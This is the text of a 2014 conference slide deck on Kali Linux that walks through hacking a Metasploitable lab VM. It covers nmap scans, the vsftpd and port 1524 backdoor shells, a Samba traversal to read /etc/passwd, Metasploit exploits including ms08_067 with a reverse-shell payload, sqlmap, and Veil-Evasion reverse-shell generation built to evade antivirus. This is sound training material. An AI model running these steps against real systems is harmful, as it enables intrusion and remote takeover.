Kali Linux Presentation on Kali Linux Ohio HTCIA

Kali Linux Presentation on Kali Linux Ohio HTCIA 2014 Spring Conference Salt Fork Lodge

Welcome – Salt Fork 2014

Tony Godfrey is the CEO / Linux Consultant of Falconer Technologies (est 2003) specializing in Linux. He has written several articles on the body of knowledge of security administration, is a regular contributor to a variety of Linux publications, and has written technical content for Linux education nation-wide at the college level. He also teaches topics covering Linux, Network Security, Cisco routers, Cybercrime and System Forensics. Welcome

Who or What is ‘Kali’?

Kali the mother goddess despite her fearful appearance, protects the good against the evil. Unlike the other Hindu deities her form is pretty scary and formidable, intended to scare away the demons both literally and figuratively! Anu Yadavalli Who is Kali?

Hindu Kali

Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewrite of Back. Track, their previous forensics Linux distribution. What is Kali Linux?

/books ◦ Official Kali Guide ◦ e. Forensics /media ◦ 7 -Zip, kali_iso, SD_formatter, Unetbootin, USB_installer, VMware, Win 32_Disk. Imager /metaspolitable /PPT What’s on the DVD?

http: //www. kali. org/

We’re going to type something We’re going to make a note Might be a question? We’re going to click on something Recon Legend Attack

Ready?

Use your powers for good

- Let’s make a folder called kali_2014 Copy the DVD contents into that folder Install 7 -Zip Install VMware Player Let’s make sure the virtual environments are working and can ‘ping’ each other Getting Ready…

Press <CTRL><Alt> at the same time to be released from the current virtual environment. You can then do a normal <Alt><Tab> to toggle between different applications. VMware Player

Kali Login root Kali Password password Metaspolitable Login msfadmin Metaspolitable Password msfadmin Logins / Passwords

Login msfadmin Password msfadmin ifconfig Jot down the IP & Netmask route Jot down the Gateway Metaspolitable V/E

Virtual Environment ◦ Metaspolitable #1 Go to TERMINAL rlogin –l root <IP Address> cd /tmp ls -l. . . vs. . . ls -la rm. X 0 -lock startx Metaspolitable V/E

Login root Password password ifconfig Jot down the IP & Netmask route Jot down the Gateway Kali V/E

Go to: Applications System Tools Preferences System Settings Display Resolution: ____ Then…[Apply] Kali V/E

From the command line, type apt-get update && apt-get upgrade Note: This has already been done to save time, but should be done after a new installation. Kali Updating

Are we good?

Top 10 Security Tools Information Gathering Vulnerability Analysis Web Applications Password Attacks Wireless Attacks Exploitation Tools Sniffing/Spoofing Maintaining Access Reverse Engineering Stress Testing Hardware Hacking Forensics Reporting Tools System Services There are several categories

Metapackages also exist

Command Line Tools Presentation on Kali Linux

ping Packet Inter. Net Groper Port = 8 Establishes physical connectivity between two entities (from Kali) ping <Target IP> Did it echo back? ping

top Tells us what services are running, processes, memory allocation Basically, a live system monitor top

df Tells us how much space is available or ‘disk free’ df

du Tells us how much space is taken or ‘disk used’. You can get a shorter report by… ‘du –s’ … (disk used –summary) du

free How much ‘free’ memory is available free

ls This is for ‘list’ ls –l (list –long) ls -la (list – long – all attributes) ls

pwd Directory structure Means ‘path to working directory’ or ‘print working directory’ pwd

ps Means ‘Process Status’ ◦ aux – auxiliary view ◦ pstree – shows parent/child relationships ◦ Windows – tasklist / taskkill Kill - Stops a process (ex: kill PID) ps / ps aux / pstree

Both Environments Presentation on Kali Linux

Virtual Environment #1 (Metaspolitable) ◦ Go to TERMINAL ◦ ifconfig ◦ …jot this number down… Virtual Environment #2 (Kali) ◦ Go to TERMINAL ◦ ifconfig ◦ …jot this number down… Can you ‘ping’ each other?

CLI & Services Presentation on Kali Linux

traceroute Essentially, ‘tracert’ in Windows traceroute –i eth 0 <Target IP> It displays the route (path) and measuring transit delays of packets across an Internet Protocol (IP) network traceroute

nmap –p 0 -65535 <Target IP> | less A security scanner used to discover hosts and services on a computer network, thus creating a "map" of the network nmap

nmap –s. S –Pn –A <Target IP> A security scanner used to discover hosts and services on a computer network – ‘s. S’ is stealth scan, ‘Pn’ not to run a ping scan, and ‘A’ is O/S detection, services, service pack. nmap

rlogin –l root <Target IP> whoami tcpdump -i eth 0 host <Target IP> A packet analyzer that runs under the command line. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached. rlogin (from Metaspolitable)

rpcinfo –p <Target IP> A utility makes a Remote Procedure Call (RPC) to an RPC server and reports what it finds. It lists all programs registered with the port mapper on the specified host. rpcinfo

showmount –e <Target IP> showmount –a <Target IP> It displays a list of all clients that have remotely mounted a file system from a specified machine in the Host parameter. This information is maintained by the [mountd] daemon on the Host parameter. showmount

telnet <Target IP> 21 After '220. . . ' user backdoored: ) <CTRL><]> quit Port 20/21 is FTP telnet

telnet <Target IP> 6200 After 'Escape character. . . ', id; <CTRL><]> quit Port 6200 - Oracle Notification Service remote port Oracle Application Server telnet

telnet <Target IP> 6667 IRC (Internet Relay Chat) Many trojans/backdoors also use this port: Dark Connection Inside, Dark FTP, Host Control, Net. Bus worm , Schedule. Agent, Sub. Seven, Trinity, Win. Satan, Vampire, Moses, Maniacrootkit, kaitex, EGO. telnet

telnet <Target IP> 1524 After 'root@meta. . ', id Many attack scripts install a backdoor shell at this port (especially those against Sun systems via holes in sendmail and RPC services like statd, ttdbserver, and cmsd). Connections to port 600/pcserver also have this problem. Note: ingreslock, Trinoo; talks UDP/TCP. telnet

Are we good?

smbclient –L <//Target IP> msfconsole. . . wait, wait. . . , then use auxiliary/admin/smb/samba_symlink_traversal set RHOST <Target IP> set SMBSHARE tmp smbclient

exploit. . . Connecting to the server. . . . <yadda, yadda>. . . Auxiliary module. . At the prompt, type exit smbclient

smbclient //<Target IP>/tmp Do you get the 'smb: >' prompt? cd rootfs cd etc more passwd Do you get a list of all user accts? smbclient

On Kali… tcpdump –I eth 0 src <Target IP> On Metaspolitable… ping open a Browser & go to CNN. com tcpdump

On Kali netdiscover –i eth 0 –r <Target IP>/24 Netdiscover is an active/passive address reconnaissance tool, mainly developed for those wireless networks without DHCP server, when you are wardriving. It can be also used on hub/switched networks. netdiscover

On Kali nikto –h <Target IP> Its an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. nikto

On Kali sqlmap –u http: //<Target IP> --dbs It is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. sqlmap

From Kali – open Ice. Weasel http: //<Target IP>/ Research: Multillidae <p. 8> The Mutillidae are a family of more than 3, 000 species of wasps (despite the names) whose wingless females resemble large, hairy ants. Their common name ‘velvet ant’ refers to their dense pile of hair which most often is bright scarlet or orange, but may also be black, white, silver, or gold. Wasp Services

From Kali – open Ice. Weasel http: //<Target IP>/ Research: Multillidae <p. 8> Mutillidae is a free, open source web application provided to allow security enthusiest to pen-test and hack a web application Web Services

From Kali whatweb <Target IP> whatweb –v <Target IP> whatweb –a 4 <Target IP> What. Web recognizes web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, Java. Script libraries, web servers, and embedded devices. whatweb

From Kali - msfconsole Presentation on Kali Linux

From Kali service postgresql start service metasploit start msfconsole Let’s fire up the database (Post. Gre. Sql) – start Metasploit – start msfconsole We will then take a look at the built-in exploit tools msfconsole

From [msf>] console help search show exploits search dns ‘Help Search’ shows all of the options, ‘Show Exploits’ show all the built-in exploits in msfconsole, ‘Search DNS’ will look for any DNS exploits. msfconsole

From [msf>] console search Microsoft search diablo search irc search http Let’s try a few more to see what they do…. msfconsole

From [msf>] console, search for ‘unreal’ info <exploit> use <exploit> show options LHOST, RHOST, LPORT, RPORT msfconsole

From [msf>] console (ex: unreal) set RHOST <IP Address> show options exploit msfconsole

From [msf>] console, search for ‘twiki’ info <exploit> use <exploit> show options LHOST, RHOST, LPORT, RPORT msfconsole

From [msf>] console (ex: ‘twiki’) set RHOST <IP Address> show options exploit msfconsole

From [msf>] console, (target: Win XP) use exploit/windows/smb/ms 08_067_netapi show options show targets set target 2 msfconsole

From [msf>] console, (target: Win XP) show options show advanced show targets show payloads msfconsole

From [msf>] console, (target: Win XP) set payload windows/shell_reverse_tcp show options set LHOST <Kali IP Address> set RHOST <Target IP Address> msfconsole

From [msf>] console, (target: Win XP) show options exploit Any errors? msfconsole

From Kali – more GUI Presentation on Kali Linux

Let’s run Zenmap Applications Kali Linux Information Gathering DNS Analysis Zenmap

Let’s run SHODAN Open a browser www. shodanhq. com type in ‘almost anything’ …Be very nervous… SHODAN

Let’s run FERN Kali Linux Wireless Attacks Wireless Tools fern-wifi-cracker FERN

Kali has many built-in tools, but you can always install more (Debian-based). But, you may always wish to add more such as recon-ng automated info gathering and network reconnaissance. recon-ng

Let’s run recon-ng… cd /opt/recon-ng /usr/bin/python recon-ng show modules recon/hosts/gather/http/web/google_site recon-ng

Let’s run recon-ng… set DOMAIN <domain. com> run (…let this run awhile…) back (…previous level…) show modules recon-ng

Let’s run recon-ng… use reporting/csv run Will add your new information to /usr/share/recon-ng/workspaces/default recon-ng

If you want something more basic…dmitry –s <domain. com> It gives you site names & IP’s dmitry

Kali has many built-in tools, but you can always install even more (Debianbased). You may always wish to add more such as veil Remote shell payload generator that can bypass many anti-virus programs.

Let’s run veil-evasion list (available payloads list) use 13 (powershell/Virtual. Alloc) generate veil

Let’s run veil 1 [ENTER] (msfvenom) (accept default) Value for LHOST (Target IP) Value for LPORT (ex: 4000) veil

Let’s run veil Output name (“Squatch”) It will store this new batch file to the /usr/share/veil/output/source folder. When the file is run from the target machine, it will attempt to do a reverse shell session with Kali. veil

Final Thoughts…

Kali Information See ‘Notes’ section in this slide

Kali Comparisons See ‘Notes’ section in this slide

Kali-specific Websites See ‘Notes’ section in this slide

Kali Publications See ‘Notes’ section in this slide

Questions/Concerns

But wait, that’s not all

The Firefox web browser is great tool to test vulnerabilities of a website. There is a portable version on Portable. Apps. I would suggest this version and install the needed plugins. Then, fire up the browser and ‘use your powers for good’. Pentesting with Firefox?

Thank You

Thank you for your time. Falconer Technologies Tony. Godfrey@Falconer. Technologies. com 877 / TUX RULZ or 877 / 889 -7859 Thank you